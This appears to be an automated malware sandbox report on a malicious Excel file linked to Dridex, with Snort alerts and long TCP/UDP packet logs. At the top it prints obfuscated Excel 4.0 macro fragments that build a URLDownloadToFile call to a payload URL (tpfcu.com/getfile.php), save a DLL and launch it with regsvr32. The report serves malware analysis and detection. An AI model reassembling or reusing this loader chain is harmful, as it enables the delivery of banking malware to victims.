                                                                                                                                                      ,,,,,,,,,,,,,,,ht,,,,,,,,,,,,,,,,,,,,,,,,,,tps://,,,,,,,,,,,,,,,,,,,,,,,,,,tpfcu.com/getfile.,,,,,,,,,,,,,,,,,,,,,,,,,,php,,,,,,,,,,,"=CALL(before.2.18.46.sheet!BJ29&before.2.18.46.sheet!BN29,before.2.18.46.sheet!BM35&before.2.18.46.sheet!BM38&before.2.18.46.sheet!BS41&before.2.18.46.sheet!BU41&before.2.18.46.sheet!BS25,before.2.18.46.sheet!BK50&before.2.18.46.sheet!BS42,before.2.18.46.sheet!BP33,before.2.18.46.sheet!BJ19&BJ20&BJ21&BJ22,before.2.18.46.sheet!BN24,before.2.18.46.sheet!BP38,before.2.18.46.sheet!BP41)",,,,,,,,,,,,,,,,,,,,,,,,,,=Sheet2!BB10(),,,,,,,,,,,,,,,,,,,..\iepfusn.dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,A,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,UR,,,,LMon,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,UR,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,LDownl,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,,,oa,,dToFile,,,,,,,,,,,re,,,,,,,,,,,,,CBB,,,,,,,,,,,,,gs,,,,,,,,,,,,,,,,,,,,,,,,,,"=""vr32 -s """,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,JJC,,,,,,,,,,

                                                                                                                                                      Network Behavior

                                                                                                                                                      Snort IDS Alerts

                                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                      06/09/21-15:22:05.833841ICMP382ICMP PING Windows192.168.2.68.8.7.7
                                                                                                                                                      06/09/21-15:22:05.833841ICMP384ICMP PING192.168.2.68.8.7.7
                                                                                                                                                      06/09/21-15:22:10.528872ICMP382ICMP PING Windows192.168.2.68.8.7.7
                                                                                                                                                      06/09/21-15:22:10.528872ICMP384ICMP PING192.168.2.68.8.7.7
                                                                                                                                                      06/09/21-15:22:20.469415ICMP382ICMP PING Windows192.168.2.68.8.7.7
                                                                                                                                                      06/09/21-15:22:20.469415ICMP384ICMP PING192.168.2.68.8.7.7
                                                                                                                                                      06/09/21-15:22:25.029456ICMP382ICMP PING Windows192.168.2.68.8.7.7
                                                                                                                                                      06/09/21-15:22:25.029456ICMP384ICMP PING192.168.2.68.8.7.7
                                                                                                                                                      06/09/21-15:22:36.677659ICMP382ICMP PING Windows192.168.2.68.8.7.7
                                                                                                                                                      06/09/21-15:22:36.677659ICMP384ICMP PING192.168.2.68.8.7.7
                                                                                                                                                      06/09/21-15:22:41.530548ICMP382ICMP PING Windows192.168.2.68.8.7.7
                                                                                                                                                      06/09/21-15:22:41.530548ICMP384ICMP PING192.168.2.68.8.7.7
                                                                                                                                                      06/09/21-15:22:49.386614TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434974018.117.84.120192.168.2.6
                                                                                                                                                      06/09/21-15:23:25.363224TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434974718.117.84.120192.168.2.6
                                                                                                                                                      06/09/21-15:23:57.298792TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434975018.117.84.120192.168.2.6

                                                                                                                                                      Network Port Distribution

                                                                                                                                                      TCP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Jun 9, 2021 15:21:55.282211065 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:55.420984030 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.421092987 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:55.422017097 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:55.558451891 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.561686039 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.561707973 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.561739922 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.561764956 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:55.561799049 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:55.561822891 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:55.606833935 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:55.743777037 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.743941069 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:55.744791031 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:55.920869112 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.927237034 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.927289009 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.927320004 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.927349091 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:55.927350998 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.927382946 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:55.927383900 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.927417994 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.927438021 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:55.927445889 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.927464008 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:55.927479029 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.927501917 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:55.927512884 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.927524090 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:55.927546024 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.927555084 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:55.927598953 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.065057993 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.065104961 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.065144062 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.065176010 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.065207005 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.065208912 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.065237045 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.065244913 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.065280914 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.065282106 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.065314054 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.065329075 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.065345049 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.065359116 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.065376043 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.065381050 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.065402985 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.065424919 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.065438032 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.065464973 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.065469980 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.065486908 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.065514088 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.201870918 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.201898098 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.201925993 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.201947927 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.201966047 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.201992989 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202016115 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202018976 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.202038050 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202069044 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.202095032 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.202202082 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202254057 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202256918 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.202275038 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202299118 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.202300072 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202317953 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.202327013 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202344894 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.202353001 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202367067 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.202377081 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202392101 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.202400923 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202421904 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.202423096 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202439070 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.202450037 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202466965 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.202471018 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202486992 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.202507973 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.202548027 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202574015 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202599049 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.202606916 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.202637911 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.207607985 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.207724094 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.338391066 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.338424921 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.338438988 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.338462114 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.338490009 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.338599920 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.338702917 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.338712931 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.338725090 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.338749886 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.338766098 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.338781118 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.338787079 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.338810921 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.338812113 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.338840961 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.338849068 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.338864088 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.338886976 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.338886976 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.338908911 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.338932037 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.338933945 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.338977098 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.338994026 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.339015007 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.339040995 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.339055061 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.339061975 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.339081049 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.339091063 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.339123964 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.339133024 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.339148045 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.339152098 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.339169025 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.339194059 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.339204073 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.339221954 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.339231968 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.339252949 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.339261055 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.339273930 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.339304924 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.339309931 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.339329958 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.339350939 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.339354992 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.339380026 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.339387894 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.339404106 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.339426994 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.339430094 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.339457035 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.339462996 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.339482069 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.339494944 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.339521885 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.339530945 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.339540958 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.339566946 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.339582920 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.339629889 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.344010115 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.344036102 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.344147921 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.475028992 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.475059986 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.475073099 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.475085974 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.475107908 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.475147009 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.475167990 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.475191116 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.475208998 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.475212097 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.475234032 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.475253105 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:56.475265026 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.475342989 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.482059956 CEST49715443192.168.2.6107.180.50.232
                                                                                                                                                      Jun 9, 2021 15:21:56.618499994 CEST44349715107.180.50.232192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:49.096944094 CEST49740443192.168.2.618.117.84.120
                                                                                                                                                      Jun 9, 2021 15:22:49.236207008 CEST4434974018.117.84.120192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:49.236434937 CEST49740443192.168.2.618.117.84.120
                                                                                                                                                      Jun 9, 2021 15:22:49.246424913 CEST49740443192.168.2.618.117.84.120
                                                                                                                                                      Jun 9, 2021 15:22:49.385665894 CEST4434974018.117.84.120192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:49.386614084 CEST4434974018.117.84.120192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:49.386635065 CEST4434974018.117.84.120192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:49.386751890 CEST49740443192.168.2.618.117.84.120
                                                                                                                                                      Jun 9, 2021 15:22:49.393546104 CEST49740443192.168.2.618.117.84.120
                                                                                                                                                      Jun 9, 2021 15:22:49.533077002 CEST4434974018.117.84.120192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:22:49.577728987 CEST49740443192.168.2.618.117.84.120
                                                                                                                                                      Jun 9, 2021 15:22:54.731709957 CEST49740443192.168.2.618.117.84.120
                                                                                                                                                      Jun 9, 2021 15:22:54.907586098 CEST4434974018.117.84.120192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:23:24.941314936 CEST49740443192.168.2.618.117.84.120
                                                                                                                                                      Jun 9, 2021 15:23:25.080559015 CEST49747443192.168.2.618.117.84.120
                                                                                                                                                      Jun 9, 2021 15:23:25.220175028 CEST4434974718.117.84.120192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:23:25.220691919 CEST49747443192.168.2.618.117.84.120
                                                                                                                                                      Jun 9, 2021 15:23:25.222739935 CEST49747443192.168.2.618.117.84.120
                                                                                                                                                      Jun 9, 2021 15:23:25.362360954 CEST4434974718.117.84.120192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:23:25.363224030 CEST4434974718.117.84.120192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:23:25.363259077 CEST4434974718.117.84.120192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:23:25.364415884 CEST49747443192.168.2.618.117.84.120
                                                                                                                                                      Jun 9, 2021 15:23:25.368238926 CEST49747443192.168.2.618.117.84.120
                                                                                                                                                      Jun 9, 2021 15:23:25.508029938 CEST4434974718.117.84.120192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:23:25.510736942 CEST49747443192.168.2.618.117.84.120
                                                                                                                                                      Jun 9, 2021 15:23:25.687309980 CEST4434974718.117.84.120192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:23:56.901083946 CEST49747443192.168.2.618.117.84.120
                                                                                                                                                      Jun 9, 2021 15:23:57.016983986 CEST49750443192.168.2.618.117.84.120
                                                                                                                                                      Jun 9, 2021 15:23:57.158025980 CEST4434975018.117.84.120192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:23:57.158145905 CEST49750443192.168.2.618.117.84.120
                                                                                                                                                      Jun 9, 2021 15:23:57.158910990 CEST49750443192.168.2.618.117.84.120
                                                                                                                                                      Jun 9, 2021 15:23:57.297934055 CEST4434975018.117.84.120192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:23:57.298791885 CEST4434975018.117.84.120192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:23:57.298819065 CEST4434975018.117.84.120192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:23:57.298913956 CEST49750443192.168.2.618.117.84.120
                                                                                                                                                      Jun 9, 2021 15:23:57.301543951 CEST49750443192.168.2.618.117.84.120
                                                                                                                                                      Jun 9, 2021 15:23:57.440867901 CEST4434975018.117.84.120192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:23:57.442948103 CEST49750443192.168.2.618.117.84.120
                                                                                                                                                      Jun 9, 2021 15:23:57.619473934 CEST4434975018.117.84.120192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:24:08.904089928 CEST49750443192.168.2.618.117.84.120

                                                                                                                                                      UDP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Jun 9, 2021 15:21:38.244496107 CEST6426753192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:38.294626951 CEST53642678.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:38.999614000 CEST4944853192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:39.059832096 CEST53494488.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:39.159909964 CEST6034253192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:39.210349083 CEST53603428.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:40.534393072 CEST6134653192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:40.584779024 CEST53613468.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:42.137758970 CEST5177453192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:42.198226929 CEST53517748.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:43.285564899 CEST5602353192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:43.346214056 CEST53560238.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:45.533961058 CEST5838453192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:45.584702015 CEST53583848.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:49.907931089 CEST6026153192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:49.958479881 CEST53602618.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:51.077616930 CEST5606153192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:51.183701038 CEST53560618.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:51.218998909 CEST5833653192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:51.277750969 CEST53583368.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:51.637789011 CEST5378153192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:51.717477083 CEST53537818.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:52.668123007 CEST5378153192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:52.742284060 CEST53537818.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:53.718720913 CEST5378153192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:53.776930094 CEST53537818.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.219571114 CEST5406453192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:55.279922962 CEST53540648.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.392092943 CEST5281153192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:55.444571972 CEST53528118.8.8.8192.168.2.6
                                                                                                                                                      Jun 9, 2021 15:21:55.776357889 CEST5378153192.168.2.68.8.8.8
                                                                                                                                                      Jun 9, 2021 15:21:55.835069895 CEST53537818.8.8.8192.168.2.6
